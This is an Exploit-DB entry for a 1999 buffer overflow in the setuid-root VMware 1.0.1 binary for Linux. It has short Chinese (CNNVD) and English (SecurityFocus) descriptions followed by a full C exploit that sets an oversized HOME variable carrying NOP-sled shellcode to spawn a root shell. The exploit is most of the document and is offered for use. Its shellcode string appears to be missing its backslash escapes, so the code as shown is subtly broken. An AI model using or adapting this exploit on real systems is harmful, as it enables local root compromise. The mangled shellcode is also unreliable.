https://www.exploit-db.com/exploits/19371
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199906-029

Linux的VMWare1.0.1版本存在缓冲区溢出漏洞。可以借助一个长的HOME环境变量导致该漏洞。

source: http://www.securityfocus.com/bid/490/info


VMWare is virtual machine software produced by VMWare inc. VMWare version 1.0.1 for Linux is vulnerable to a buffer overflow attack. Since VMWare is installed with binaries that are setuid root, local users can exploit the hole allowing for arbitrary code to be executed as root. The consequences are a local root compromise. 

/* 
 * VMware v1.0.1 root sploit
 * funkySh 02/07/99
 * 
 * 1. Redhat 5.2     2.2.9 offset 800-1100
 * 2.                      offset 1600-2200
 * 1. Slackware 3.6  2.2.9 offset 0
 * 2.                      offset ?       
 *
 * [ 1 - started from xterm on localhost ]
 * [ 2 - started from telnet, with valid display ]
 */


#include <stdio.h> 

char code[] = "x31xdbx89xd8xb0x17xcdx80" /*setuid(0) */
              "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0c"
              "xb0x0bx89xf3x8dx4ex08x8dx56x0cxcdx80x31xdb"
              "x89xd8x40xcdx80xe8xdcxffxffxff/bin/sh";

#define BUFFER 1032
#define NOP 0x90 
#define RET_ADDR 0xbfffdf50
#define PATH "/usr/local/bin/vmware"

char buf[BUFFER];

void main(int argc, char * argv[])
{
  int i, offset = 0;
  if(argc > 1) offset = atoi(argv[1]);

 memset(buf,NOP,BUFFER);
 memcpy(buf+800,code,strlen(code));
 for(i=854+2;i<BUFFER-2;i+=4)
   *(int *)&buf[i]=RET_ADDR+offset;

  setenv("HOME", buf, 1);
  execl(PATH,"vmware","-display","127.0.0.1:0",0);
  /* change IP if required */
}

来源:BID
名称:490
链接:http://www.securityfocus.com/bid/490